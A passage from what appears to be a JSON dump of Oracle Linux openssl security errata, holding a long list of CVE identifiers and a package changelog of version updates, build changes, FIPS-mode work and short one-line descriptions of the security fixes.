Nalin Dahyabhai \n- disable MDC2 support\n* Sun Jul 02 2000 Nalin Dahyabhai \n- tweak the disabling of RC5, IDEA support\n- tweak the makefile\n* Thu Jun 29 2000 Nalin Dahyabhai \n- strip binaries and libraries\n- rework certificate makefile to have the right parts for Apache\n* Wed Jun 28 2000 Nalin Dahyabhai \n- use %{_perl} instead of /usr/bin/perl\n- disable alpha until it passes its own test suite\n* Fri Jun 09 2000 Nalin Dahyabhai \n- move the passwd.1 man page out of the passwd package's way\n* Fri Jun 02 2000 Nalin Dahyabhai \n- update to 0.9.5a, modified for U.S.\n- add perl as a build-time requirement\n- move certificate makefile to another package\n- disable RC5, IDEA, RSA support\n- remove optimizations for now\n* Wed Mar 01 2000 Florian La Roche \n- Bero told me to move the Makefile into this package\n* Wed Mar 01 2000 Florian La Roche \n- add lib*.so symlinks to link dynamically against shared libs\n* Tue Feb 29 2000 Florian La Roche \n- update to 0.9.5\n- run ldconfig directly in post/postun\n- add FAQ\n* Sat Dec 18 1999 Bernhard Rosenkrdnzer \n- Fix build on non-x86 platforms\n* Fri Nov 12 1999 Bernhard Rosenkrdnzer \n- move /usr/share/ssl/* from -devel to main package\n* Tue Oct 26 1999 Bernhard Rosenkrdnzer \n- inital packaging\n- changes from base:\n - Move /usr/local/ssl to /usr/share/ssl for FHS compliance\n - handle RPM_OPT_FLAGS", "edition": 69, "modified": "2019-03-13T00:00:00", "published": "2019-03-13T00:00:00", "id": "ELSA-2019-4581", "href": "http://linux.oracle.com/errata/ELSA-2019-4581.html", "title": "openssl security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-16T20:46:18", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4000", "CVE-2013-0166", "CVE-2014-3505", "CVE-2012-2333", "CVE-2014-3508", "CVE-2015-1792", "CVE-2014-3566", "CVE-2006-3738", "CVE-2018-0732", "CVE-2009-1379", "CVE-2006-2940", "CVE-2006-2937", "CVE-2015-3197", "CVE-2007-4995", "CVE-2011-4108", "CVE-2009-1377", "CVE-2014-3572", "CVE-2016-6306", "CVE-2016-0705", "CVE-2015-0206", "CVE-2015-1789", "CVE-2016-2183", "CVE-2013-0169", "CVE-2015-0286", "CVE-2013-6449", "CVE-2016-2178", "CVE-2006-4343", "CVE-2003-0544", "CVE-2007-3108", "CVE-2014-3507", "CVE-2015-3195", "CVE-2003-0543", "CVE-2016-2108", "CVE-2011-4576", "CVE-2003-0545", "CVE-2005-2946", "CVE-2014-3571", "CVE-2005-2969", "CVE-2016-0799", "CVE-2016-6302", "CVE-2006-4339", "CVE-2004-0112", "CVE-2014-3513", "CVE-2016-2177", "CVE-2015-0288", "CVE-2009-4355", "CVE-2012-1165", "CVE-2011-4577", "CVE-2014-0224", "CVE-2016-2105", "CVE-2010-0742", "CVE-2008-0891", "CVE-2015-3194", "CVE-2016-2107", "CVE-2017-3731", "CVE-2004-0975", "CVE-2011-4619", "CVE-2003-0131", "CVE-2014-3511", "CVE-2004-0079", "CVE-2007-5135", "CVE-2011-0014", "CVE-2014-8275", "CVE-2016-2180", "CVE-2016-0797", "CVE-2016-0702", "CVE-2016-8610", "CVE-2014-3570", "CVE-2009-1378", "CVE-2015-7575", "CVE-2015-3196", "CVE-2014-3470", "CVE-2014-3506", "CVE-2016-2109", "CVE-2012-4929", "CVE-2016-2181", "CVE-2016-6304", "CVE-2013-6450", "CVE-2018-0739", "CVE-2012-0050", "CVE-2009-3555", "CVE-2010-1633", "CVE-2015-0293", "CVE-2010-5298", "CVE-2014-0160", "CVE-2014-8176", "CVE-2013-4353", "CVE-2008-1672", "CVE-2014-0195", "CVE-2014-0198", "CVE-2015-0209", "CVE-2014-3567", "CVE-2015-0204", "CVE-2012-2110", "CVE-2012-0884", "CVE-2015-1790", "CVE-2014-3510", "CVE-2019-1559", "CVE-2016-2182", "CVE-2010-3864", "CVE-2005-0109", "CVE-2015-0287", "CVE-2011-3207", "CVE-2015-0289", "CVE-2015-3216", "CVE-2015-0292", "CVE-2018-0737", "CVE-2003-0078", "CVE-2015-0205", "CVE-2016-2179", "CVE-2016-2106", "CVE-2003-0147", "CVE-2014-3509", "CVE-2015-1791", "CVE-2014-0221"], "description": "[1.0.1e-58.0.1]\n- Oracle bug 28730228: backport CVE-2018-0732\n- Oracle bug 28758493: backport CVE-2018-0737\n- Merge upstream patch to fix CVE-2018-0739\n- Avoid out-of-bounds read. Fixes CVE 2017-3735. By Rich Salz\n- sha256 is used for the RSA pairwise consistency test instead of sha1\n[1.0.1e-58]\n- fix CVE-2019-1559 - 0-byte record padding oracle\n[1.0.1e-57]\n- fix CVE-2017-3731 - DoS via truncated packets with RC4-MD5 cipher\n[1.0.1e-55]\n- fix CVE-2016-8610 - DoS of single-threaded servers via excessive alerts\n[1.0.1e-54]\n- fix handling of ciphersuites present after the FALLBACK_SCSV\n ciphersuite entry (#1386350)\n[1.0.1e-53]\n- add README.legacy-settings\n[1.0.1e-52]\n- deprecate and disable verification of insecure hash algorithms\n- disallow DH keys with less than 1024 bits in TLS client\n- remove support for weak and export ciphersuites\n- use correct digest when exporting keying material in TLS1.2 (#1376741)\n[1.0.1e-50]\n- fix CVE-2016-2177 - possible integer overflow\n- fix CVE-2016-2178 - non-constant time DSA operations\n- fix CVE-2016-2179 - further DoS issues in DTLS\n- fix CVE-2016-2180 - OOB read in TS_OBJ_print_bio()\n- fix CVE-2016-2181 - DTLS1 replay protection and unprocessed records issue\n- fix CVE-2016-2182 - possible buffer overflow in BN_bn2dec()\n- fix CVE-2016-6302 - insufficient TLS session ticket HMAC length check\n- fix CVE-2016-6304 - unbound memory growth with OCSP status request\n- fix CVE-2016-6306 - certificate message OOB reads\n- mitigate CVE-2016-2183 - degrade all 64bit block ciphers and RC4 to\n 112 bit effective strength\n- replace expired testing certificates\n[1.0.1e-49]\n- fix CVE-2016-2105 - possible overflow in base64 encoding\n- fix CVE-2016-2106 - possible overflow in EVP_EncryptUpdate()\n- fix CVE-2016-2107 - padding oracle in stitched AES-NI CBC-MAC\n- fix CVE-2016-2108 - memory corruption in ASN.1 encoder\n- fix CVE-2016-2109 - possible DoS when reading ASN.1 data from BIO\n- fix CVE-2016-0799 - memory issues in BIO_printf\n[1.0.1e-48]\n- fix CVE-2016-0702 - side channel attack on modular exponentiation\n- fix CVE-2016-0705 - double-free in DSA private key parsing\n- fix CVE-2016-0797 - heap corruption in BN_hex2bn and BN_dec2bn\n[1.0.1e-47]\n- fix CVE-2015-3197 - SSLv2 ciphersuite enforcement\n- disable SSLv2 in the generic TLS method\n[1.0.1e-46]\n- fix 1-byte memory leak in pkcs12 parse (#1229871)\n- document some options of the speed command (#1197095)\n[1.0.1e-45]\n- fix high-precision timestamps in timestamping authority\n[1.0.1e-44]\n- fix CVE-2015-7575 - disallow use of MD5 in TLS1.2\n[1.0.1e-43]\n- fix CVE-2015-3194 - certificate verify crash with missing PSS parameter\n- fix CVE-2015-3195 - X509_ATTRIBUTE memory leak\n- fix CVE-2015-3196 - race condition when handling PSK identity hint\n[1.0.1e-42]\n- fix regression caused by mistake in fix for CVE-2015-1791\n[1.0.1e-41]\n- improved fix for CVE-2015-1791\n- add missing parts of CVE-2015-0209 fix for corectness although unexploitable\n[1.0.1e-40]\n- fix CVE-2014-8176 - invalid free in DTLS buffering code\n- fix CVE-2015-1789 - out-of-bounds read in X509_cmp_time\n- fix CVE-2015-1790 - PKCS7 crash with missing EncryptedContent\n- fix CVE-2015-1791 - race condition handling NewSessionTicket\n- fix CVE-2015-1792 - CMS verify infinite loop with unknown hash function\n[1.0.1e-39]\n- fix CVE-2015-3216 - regression in RAND locking that can cause segfaults on\n read in multithreaded applications\n[1.0.1e-38]\n- fix CVE-2015-4000 - prevent the logjam attack on client - restrict\n the DH key size to at least 768 bits (limit will be increased in future)\n[1.0.1e-37]\n- drop the AES-GCM restriction of 2^32 operations because the IV is\n always 96 bits (32 bit fixed field + 64 bit invocation field)\n[1.0.1e-36]\n- update fix for CVE-2015-0287 to what was released upstream\n[1.0.1e-35]\n- fix CVE-2015-0209 - potential use after free in d2i_ECPrivateKey()\n- fix CVE-2015-0286 - improper handling of ASN.1 boolean comparison\n- fix CVE-2015-0287 - ASN.1 structure reuse decoding memory corruption\n- fix CVE-2015-0288 - X509_to_X509_REQ NULL pointer dereference\n- fix CVE-2015-0289 - NULL dereference decoding invalid PKCS#7 data\n- fix CVE-2015-0292 - integer underflow in base64 decoder\n- fix CVE-2015-0293 - triggerable assert in SSLv2 server\n[1.0.1e-34]\n- copy digest algorithm when handling SNI context switch\n- improve documentation of ciphersuites - patch by Hubert Kario\n- add support for setting Kerberos service and keytab in\n s_server and s_client\n[1.0.1e-33]\n- fix CVE-2014-3570 - incorrect computation in BN_sqr()\n- fix CVE-2014-3571 - possible crash in dtls1_get_record()\n- fix CVE-2014-3572 - possible downgrade of ECDH ciphersuite to non-PFS state\n- fix CVE-2014-8275 - various certificate fingerprint issues\n- fix CVE-2015-0204 - remove support for RSA ephemeral keys for non-export\n ciphersuites and on server\n- fix CVE-2015-0205 - do not allow unauthenticated client DH certificate\n- fix CVE-2015-0206 - possible memory leak when buffering DTLS records\n[1.0.1e-32]\n- use FIPS approved method for computation of d in RSA\n[1.0.1e-31]\n- fix CVE-2014-3567 - memory leak when handling session tickets\n- fix CVE-2014-3513 - memory leak in srtp support\n- add support for fallback SCSV to partially mitigate CVE-2014-3566\n (padding attack on SSL3)\n[1.0.1e-30]\n- add ECC TLS extensions to DTLS (#1119800)\n[1.0.1e-29]\n- fix CVE-2014-3505 - doublefree in DTLS packet processing\n- fix CVE-2014-3506 - avoid memory exhaustion in DTLS\n- fix CVE-2014-3507 - avoid memory leak in DTLS\n- fix CVE-2014-3508 - fix OID handling to avoid information leak\n- fix CVE-2014-3509 - fix race condition when parsing server hello\n- fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS\n- fix CVE-2014-3511 - disallow protocol downgrade via fragmentation\n[1.0.1e-28]\n- fix CVE-2014-0224 fix that broke EAP-FAST session resumption support\n[1.0.1e-26]\n- drop EXPORT, RC2, and DES from the default cipher list (#1057520)\n- print ephemeral key size negotiated in TLS handshake (#1057715)\n- do not include ECC ciphersuites in SSLv2 client hello (#1090952)\n- properly detect encryption failure in BIO (#1100819)\n- fail on hmac integrity check if the .hmac file is empty (#1105567)\n- FIPS mode: make the limitations on DSA, DH, and RSA keygen\n length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment\n variable is set\n[1.0.1e-25]\n- fix CVE-2010-5298 - possible use of memory after free\n- fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment\n- fix CVE-2014-0198 - possible NULL pointer dereference\n- fix CVE-2014-0221 - DoS from invalid DTLS handshake packet\n- fix CVE-2014-0224 - SSL/TLS MITM vulnerability\n- fix CVE-2014-3470 - client-side DoS when using anonymous ECDH\n[1.0.1e-24]\n- add back support for secp521r1 EC curve\n[1.0.1e-23]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension\n[1.0.1e-22]\n- use 2048 bit RSA key in FIPS selftests\n[1.0.1e-21]\n- add DH_compute_key_padded needed for FIPS CAVS testing\n- make 3des strength to be 128 bits instead of 168 (#1056616)\n- FIPS mode: do not generate DSA keys and DH parameters < 2048 bits\n- FIPS mode: use approved RSA keygen (allows only 2048 and 3072 bit keys)\n- FIPS mode: add DH selftest\n- FIPS mode: reseed DRBG properly on RAND_add()\n- FIPS mode: add RSA encrypt/decrypt selftest\n- FIPS mode: add hard limit for 2^32 GCM block encryptions with the same key\n- use the key length from configuration file if req -newkey rsa is invoked\n[1.0.1e-20]\n- fix CVE-2013-4353 - Invalid TLS handshake crash\n[1.0.1e-19]\n- fix CVE-2013-6450 - possible MiTM attack on DTLS1\n[1.0.1e-18]\n- fix CVE-2013-6449 - crash when version in SSL structure is incorrect\n[1.0.1e-17]\n- add back some no-op symbols that were inadvertently dropped\n[1.0.1e-16]\n- do not advertise ECC curves we do not support\n- fix CPU identification on Cyrix CPUs\n[1.0.1e-15]\n- make DTLS1 work in FIPS mode\n- avoid RSA and DSA 512 bits and Whirlpool in 'openssl speed' in FIPS mode\n[1.0.1e-14]\n- installation of dracut-fips marks that the FIPS module is installed\n[1.0.1e-13]\n- avoid dlopening libssl.so from libcrypto\n[1.0.1e-12]\n- fix small memory leak in FIPS aes selftest\n- fix segfault in openssl speed hmac in the FIPS mode\n[1.0.1e-11]\n- document the nextprotoneg option in manual pages\n original patch by Hubert Kario\n[1.0.1e-9]\n- always perform the FIPS selftests in library constructor\n if FIPS module is installed\n[1.0.1e-8]\n- fix use of rdrand if available\n- more commits cherry picked from upstream\n- documentation fixes\n[1.0.1e-7]\n- additional manual page fix\n- use symbol versioning also for the textual version\n[1.0.1e-6]\n- additional manual page fixes\n- cleanup speed command output for ECDH ECDSA\n[1.0.1e-5]\n- use _prefix macro\n[1.0.1e-4]\n- add relro linking flag\n[1.0.1e-2]\n- add support for the -trusted_first option for certificate chain verification\n[1.0.1e-1]\n- rebase to the 1.0.1e upstream version\n[1.0.0-28]\n- fix for CVE-2013-0169 - SSL/TLS CBC timing attack (#907589)\n- fix for CVE-2013-0166 - DoS in OCSP signatures checking (#908052)\n- enable compression only if explicitly asked for or OPENSSL_DEFAULT_ZLIB\n environment variable is set (fixes CVE-2012-4929 #857051)\n- use __secure_getenv() everywhere instead of getenv() (#839735)\n[1.0.0-27]\n- fix sslrand(1) and sslpasswd(1) reference in openssl(1) manpage (#841645)\n- drop superfluous lib64 fixup in pkgconfig .pc files (#770872)\n- force BIO_accept_new(*:\n) to listen on IPv4\n[1.0.0-26]\n- use PKCS#8 when writing private keys in FIPS mode as the old\n PEM encryption mode is not FIPS compatible (#812348)\n[1.0.0-25]\n- fix for CVE-2012-2333 - improper checking for record length in DTLS (#820686)\n- properly initialize tkeylen in the CVE-2012-0884 fix\n[1.0.0-24]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)\n[1.0.0-23]\n- fix problem with the SGC restart patch that might terminate handshake\n incorrectly\n- fix for CVE-2012-0884 - MMA weakness in CMS and PKCS#7 code (#802725)\n- fix for CVE-2012-1165 - NULL read dereference on bad MIME headers (#802489)\n[1.0.0-22]\n- fix incorrect encryption of unaligned chunks in CFB, OFB and CTR modes\n[1.0.0-21]\n- fix for CVE-2011-4108 & CVE-2012-0050 - DTLS plaintext recovery\n vulnerability and additional DTLS fixes (#771770)\n- fix for CVE-2011-4576 - uninitialized SSL 3.0 padding (#771775)\n- fix for CVE-2011-4577 - possible DoS through malformed RFC 3779 data (#771778)\n- fix for CVE-2011-4619 - SGC restart DoS attack (#771780)\n[1.0.0-20]\n- fix x86cpuid.pl - patch by Paolo Bonzini\n[1.0.0-19]\n- add known answer test for SHA2 algorithms\n[1.0.0-18]\n- fix missing initialization of a variable in the CHIL engine (#740188)\n[1.0.0-17]\n- initialize the X509_STORE_CTX properly for CRL lookups - CVE-2011-3207\n (#736087)\n[1.0.0-16]\n- merge the optimizations for AES-NI, SHA1, and RC4 from the intelx\n engine to the internal implementations\n[1.0.0-15]\n- better documentation of the available digests in apps (#693858)\n- backported CHIL engine fixes (#693863)\n- allow testing build without downstream patches (#708511)\n- enable partial RELRO when linking (#723994)\n- add intelx engine with improved performance on new Intel CPUs\n- add OPENSSL_DISABLE_AES_NI environment variable which disables\n the AES-NI support (does not affect the intelx engine)\n[1.0.0-14]\n- use the AES-NI engine in the FIPS mode\n[1.0.0-11]\n- add API necessary for CAVS testing of the new DSA parameter generation\n[1.0.0-10]\n- fix OCSP stapling vulnerability - CVE-2011-0014 (#676063)\n- correct the README.FIPS document\n[1.0.0-8]\n- add -x931 parameter to openssl genrsa command to use the ANSI X9.31\n key generation method\n- use FIPS-186-3 method for DSA parameter generation\n- add OPENSSL_FIPS_NON_APPROVED_MD5_ALLOW environment variable\n to allow using MD5 when the system is in the maintenance state\n even if the /proc fips flag is on\n- make openssl pkcs12 command work by default in the FIPS mode\n[1.0.0-7]\n- listen on ipv6 wildcard in s_server so we accept connections\n from both ipv4 and ipv6 (#601612)\n- fix openssl speed command so it can be used in the FIPS mode\n with FIPS allowed ciphers (#619762)\n[1.0.0-6]\n- disable code for SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG - CVE-2010-3864\n (#649304)\n[1.0.0-5]\n- fix race in extension parsing code - CVE-2010-3864 (#649304)\n[1.0.0-4]\n- openssl man page fix (#609484)\n[1.0.0-3]\n- fix wrong ASN.1 definition of OriginatorInfo - CVE-2010-0742 (#598738)\n- fix information leak in rsa_verify_recover - CVE-2010-1633 (#598732)\n[1.0.0-2]\n- make CA dir readable - the private keys are in private subdir (#584810)\n- a few fixes from upstream CVS\n- make X509_NAME_hash_old work in FIPS mode (#568395)\n[1.0.0-1]\n- update to final 1.0.0 upstream release\n[1.0.0-0.22.beta5]\n- make TLS work in the FIPS mode\n[1.0.0-0.21.beta5]\n- gracefully handle zero length in assembler implementations of\n OPENSSL_cleanse (#564029)\n- do not fail in s_server if client hostname not resolvable (#561260)\n[1.0.0-0.20.beta5]\n- new upstream release\n[1.0.0-0.19.beta4]\n- fix CVE-2009-4355 - leak in applications incorrectly calling\n CRYPTO_free_all_ex_data() before application exit (#546707)\n- upstream fix for future TLS protocol version handling\n[1.0.0-0.18.beta4]\n- add support for Intel AES-NI\n[1.0.0-0.17.beta4]\n- upstream fix compression handling on session resumption\n- various null checks and other small fixes from upstream\n- upstream changes for the renegotiation info according to the latest draft\n[1.0.0-0.16.beta4]\n- fix non-fips mingw build (patch by Kalev Lember)\n- add IPV6 fix for DTLS\n[1.0.0-0.15.beta4]\n- add better error reporting for the unsafe renegotiation\n[1.0.0-0.14.beta4]\n- fix build on s390x\n[1.0.0-0.13.beta4]\n- disable enforcement of the renegotiation extension on the client (#537962)\n- add fixes from the current upstream snapshot\n[1.0.0-0.12.beta4]\n- keep the beta status in version number at 3 so we do not have to rebuild\n openssh and possibly other dependencies with too strict version check\n[1.0.0-0.11.beta4]\n- update to new upstream version, no soname bump needed\n- fix CVE-2009-3555 - note that the fix is bypassed if SSL_OP_ALL is used\n so the compatibility with unfixed clients is not broken. The\n protocol extension is also not final.\n[1.0.0-0.10.beta3]\n- fix use of freed memory if SSL_CTX_free() is called before\n SSL_free() (#521342)\n[1.0.0-0.9.beta3]\n- fix typo in DTLS1 code (#527015)\n- fix leak in error handling of d2i_SSL_SESSION()\n[1.0.0-0.8.beta3]\n- fix RSA and DSA FIPS selftests\n- reenable fixed x86_64 camellia assembler code (#521127)\n[1.0.0-0.7.beta3]\n- temporarily disable x86_64 camellia assembler code (#521127)\n[1.0.0-0.6.beta3]\n- fix openssl dgst -dss1 (#520152)\n[1.0.0-0.5.beta3]\n- drop the compat symlink hacks\n[1.0.0-0.4.beta3]\n- constify SSL_CIPHER_description()\n[1.0.0-0.3.beta3]\n- fix WWW:Curl:Easy reference in tsget\n[1.0.0-0.2.beta3]\n- enable MD-2\n[1.0.0-0.1.beta3]\n- update to new major upstream release\n[0.9.8k-7]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Wed Jul 22 2009 Bill Nottingham \n- do not build special 'optimized' versions for i686, as that's the base\n arch in Fedora now\n[0.9.8k-6]\n- abort if selftests failed and random number generator is polled\n- mention EVP_aes and EVP_sha2xx routines in the manpages\n- add README.FIPS\n- make CA dir absolute path (#445344)\n- change default length for RSA key generation to 2048 (#484101)\n[0.9.8k-5]\n- fix CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n (DTLS DoS problems) (#501253, #501254, #501572)\n[0.9.8k-4]\n- support compatibility DTLS mode for CISCO AnyConnect (#464629)\n[0.9.8k-3]\n- correct the SHLIB_VERSION define\n[0.9.8k-2]\n- add support for multiple CRLs with same subject\n- load only dynamic engine support in FIPS mode\n[0.9.8k-1]\n- update to new upstream release (minor bug fixes, security\n fixes and machine code optimizations only)\n[0.9.8j-10]\n- move libraries to /usr/lib (#239375)\n[0.9.8j-9]\n- add a static subpackage\n[0.9.8j-8]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n[0.9.8j-7]\n- must also verify checksum of libssl.so in the FIPS mode\n- obtain the seed for FIPS rng directly from the kernel device\n- drop the temporary symlinks\n[0.9.8j-6]\n- drop the temporary triggerpostun and symlinking in post\n- fix the pkgconfig files and drop the unnecessary buildrequires\n on pkgconfig as it is a rpmbuild dependency (#481419)\n[0.9.8j-5]\n- add temporary triggerpostun to reinstate the symlinks\n[0.9.8j-4]\n- no pairwise key tests in non-fips mode (#479817)\n[0.9.8j-3]\n- even more robust test for the temporary symlinks\n[0.9.8j-2]\n- try to ensure the temporary symlinks exist\n[0.9.8j-1]\n- new upstream version with necessary soname bump (#455753)\n- temporarily provide symlink to old soname to make it possible to rebuild\n the dependent packages in rawhide\n- add eap-fast support (#428181)\n- add possibility to disable zlib by setting\n- add fips mode support for testing purposes\n- do not null dereference on some invalid smime files\n- add buildrequires pkgconfig (#479493)\n[0.9.8g-11]\n- do not add tls extensions to server hello for SSLv3 either\n[0.9.8g-10]\n- move root CA bundle to ca-certificates package\n[0.9.8g-9]\n- fix CVE-2008-0891 - server name extension crash (#448492)\n- fix CVE-2008-1672 - server key exchange message omit crash (#448495)\n[0.9.8g-8]\n- super-H arch support\n- drop workaround for bug 199604 as it should be fixed in gcc-4.3\n[0.9.8g-7]\n- sparc handling\n[0.9.8g-6]\n- update to new root CA bundle from mozilla.org (r1.45)\n[0.9.8g-5]\n- Autorebuild for GCC 4.3\n[0.9.8g-4]\n- merge review fixes (#226220)\n- adjust the SHLIB_VERSION_NUMBER to reflect library name (#429846)\n[0.9.8g-3]\n- set default paths when no explicit paths are set (#418771)\n- do not add tls extensions to client hello for SSLv3 (#422081)\n[0.9.8g-2]\n- enable some new crypto algorithms and features\n- add some more important bug fixes from openssl CVS\n[0.9.8g-1]\n- update to latest upstream release, SONAME bumped to 7\n[0.9.8b-17]\n- update to new CA bundle from mozilla.org\n[0.9.8b-16]\n- fix CVE-2007-5135 - off-by-one in SSL_get_shared_ciphers (#309801)\n- fix CVE-2007-4995 - out of order DTLS fragments buffer overflow (#321191)\n- add alpha sub-archs (#296031)\n[0.9.8b-15]\n- rebuild\n[0.9.8b-14]\n- use localhost in testsuite, hopefully fixes slow build in koji\n- CVE-2007-3108 - fix side channel attack on private keys (#250577)\n- make ssl session cache id matching strict (#233599)\n[0.9.8b-13]\n- allow building on ARM architectures (#245417)\n- use reference timestamps to prevent multilib conflicts (#218064)\n- -devel package must require pkgconfig (#241031)\n[0.9.8b-12]\n- detect duplicates in add_dir properly (#206346)\n[0.9.8b-11]\n- the previous change still didn't make X509_NAME_cmp transitive\n[0.9.8b-10]\n- make X509_NAME_cmp transitive otherwise certificate lookup\n is broken (#216050)\n[0.9.8b-9]\n- aliasing bug in engine loading, patch by IBM (#213216)\n[0.9.8b-8]\n- CVE-2006-2940 fix was incorrect (#208744)\n[0.9.8b-7]\n- fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n- fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n- fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n- fix CVE-2006-4343 - sslv2 client DoS (#206940)\n[0.9.8b-6]\n- fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures (#205180)\n[0.9.8b-5]\n- set buffering to none on stdio/stdout FILE when bufsize is set (#200580)\n patch by IBM\n[0.9.8b-4.1]\n- rebuild with new binutils (#200330)\n[0.9.8b-4]\n- add a temporary workaround for sha512 test failure on s390 (#199604)\n* Thu Jul 20 2006 Tomas Mraz \n- add ipv6 support to s_client and s_server (by Jan Pazdziora) (#198737)\n- add patches for BN threadsafety, AES cache collision attack hazard fix and\n pkcs7 code memleak fix from upstream CVS\n[0.9.8b-3.1]\n- rebuild\n[0.9.8b-3]\n- dropped libica and ica engine from build\n* Wed Jun 21 2006 Joe Orton \n- update to new CA bundle from mozilla.org; adds CA certificates\n from netlock.hu and startcom.org\n[0.9.8b-2]\n- fixed a few rpmlint warnings\n- better fix for #173399 from upstream\n- upstream fix for pkcs12\n[0.9.8b-1]\n- upgrade to new version, stays ABI compatible\n- there is no more linux/config.h (it was empty anyway)\n[0.9.8a-6]\n- fix stale open handles in libica (#177155)\n- fix build if 'rand' or 'passwd' in buildroot path (#178782)\n- initialize VIA Padlock engine (#186857)\n[0.9.8a-5.2]\n- bump again for double-long bug on ppc(64)\n[0.9.8a-5.1]\n- rebuilt for new gcc4.1 snapshot and glibc changes\n[0.9.8a-5]\n- don't include SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG\n in SSL_OP_ALL (#175779)\n* Fri Dec 09 2005 Jesse Keating \n- rebuilt\n[0.9.8a-4]\n- fix build (-lcrypto was erroneusly dropped) of the updated libica\n- updated ICA engine to 1.3.6-rc3\n[0.9.8a-3]\n- disable builtin compression methods for now until they work\n properly (#173399)\n[0.9.8a-2]\n- don't set -rpath for openssl binary\n[0.9.8a-1]\n- new upstream version\n- patches partially renumbered\n[0.9.7f-11]\n- updated IBM ICA engine library and patch to latest upstream version\n[0.9.7f-10]\n- fix CAN-2005-2969 - remove SSL_OP_MSIE_SSLV2_RSA_PADDING which\n disables the countermeasure against man in the middle attack in SSLv2\n (#169863)\n- use sha1 as default for CA and cert requests - CAN-2005-2946 (#169803)\n[0.9.7f-9]\n- add *.so.soversion as symlinks in /lib (#165264)\n- remove unpackaged symlinks (#159595)\n- fixes from upstream (constant time fixes for DSA,\n bn assembler div on ppc arch, initialize memory on realloc)\n[0.9.7f-8]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7f-7]\n- fix CAN-2005-0109 - use constant time/memory access mod_exp\n so bits of private key aren't leaked by cache eviction (#157631)\n- a few more fixes from upstream 0.9.7g\n[0.9.7f-6]\n- use poll instead of select in rand (#128285)\n- fix Makefile.certificate to point to /etc/pki/tls\n- change the default string mask in ASN1 to PrintableString+UTF8String\n[0.9.7f-5]\n- update to revision 1.37 of Mozilla CA bundle\n[0.9.7f-4]\n- move certificates to _sysconfdir/pki/tls (#143392)\n- move CA directories to _sysconfdir/pki/CA\n- patch the CA script and the default config so it points to the\n CA directories\n[0.9.7f-3]\n- uninitialized variable mustn't be used as input in inline\n assembly\n- reenable the x86_64 assembly again\n[0.9.7f-2]\n- add back RC4_CHAR on ia64 and x86_64 so the ABI isn't broken\n- disable broken bignum assembly on x86_64\n[0.9.7f-1]\n- reenable optimizations on ppc64 and assembly code on ia64\n- upgrade to new upstream version (no soname bump needed)\n- disable thread test - it was testing the backport of the\n RSA blinding - no longer needed\n- added support for changing serial number to\n Makefile.certificate (#151188)\n- make ca-bundle.crt a config file (#118903)\n[0.9.7e-3]\n- libcrypto shouldn't depend on libkrb5 (#135961)\n[0.9.7e-2]\n- rebuild\n[0.9.7e-1]\n- new upstream source, updated patches\n- added patch so we are hopefully ABI compatible with upcoming\n 0.9.7f\n* Thu Feb 10 2005 Tomas Mraz \n- Support UTF-8 charset in the Makefile.certificate (#134944)\n- Added cmp to BuildPrereq\n[0.9.7a-46]\n- generate new ca-bundle.crt from Mozilla certdata.txt (revision 1.32)\n[0.9.7a-45]\n- Fixed and updated libica-1.3.4-urandom.patch patch (#122967)\n[0.9.7a-44]\n- rebuild\n[0.9.7a-43]\n- rebuild\n[0.9.7a-42]\n- rebuild\n[0.9.7a-41]\n- remove der_chop, as upstream cvs has done (CAN-2004-0975, #140040)\n[0.9.7a-40]\n- Include latest libica version with important bugfixes\n* Tue Jun 15 2004 Elliot Lee \n- rebuilt\n[0.9.7a-38]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7a-37]\n- build for linux-alpha-gcc instead of alpha-gcc on alpha (Jeff Garzik)\n[0.9.7a-36]\n- handle %{_arch}=i486/i586/i686/athlon cases in the intermediate\n header (#124303)\n[0.9.7a-35]\n- add security fixes for CAN-2004-0079, CAN-2004-0112\n* Tue Mar 16 2004 Phil Knirsch \n- Fixed libica filespec.\n[0.9.7a-34]\n- ppc/ppc64 define __powerpc__/__powerpc64__, not __ppc__/__ppc64__, fix\n the intermediate header\n[0.9.7a-33]\n- add an intermediate \n which points to the right\n arch-specific opensslconf.h on multilib arches\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n[0.9.7a-32]\n- Updated libica to latest upstream version 1.3.5.\n[0.9.7a-31]\n- Update ICA crypto engine patch from IBM to latest version.\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[0.9.7a-29]\n- rebuilt\n[0.9.7a-28]\n- Fixed libica build.\n* Wed Feb 04 2004 Nalin Dahyabhai \n- add '-ldl' to link flags added for Linux-on-ARM (#99313)\n[0.9.7a-27]\n- updated ca-bundle.crt: removed expired GeoTrust roots, added\n freessl.com root, removed trustcenter.de Class 0 root\n[0.9.7a-26]\n- Fix link line for libssl (bug #111154).\n[0.9.7a-25]\n- add dependency on zlib-devel for the -devel package, which depends on zlib\n symbols because we enable zlib for libssl (#102962)\n[0.9.7a-24]\n- Use /dev/urandom instead of PRNG for libica.\n- Apply libica-1.3.5 fix for /dev/urandom in icalinux.c\n- Use latest ICA engine patch from IBM.\n[0.9.7a-22.1]\n- rebuild\n[0.9.7a-22]\n- rebuild (22 wasn't actually built, fun eh?)\n[0.9.7a-23]\n- re-disable optimizations on ppc64\n* Tue Sep 30 2003 Joe Orton \n- add a_mbstr.c fix for 64-bit platforms from CVS\n[0.9.7a-22]\n- add -Wa,--noexecstack to RPM_OPT_FLAGS so that assembled modules get tagged\n as not needing executable stacks\n[0.9.7a-21]\n- rebuild\n* Thu Sep 25 2003 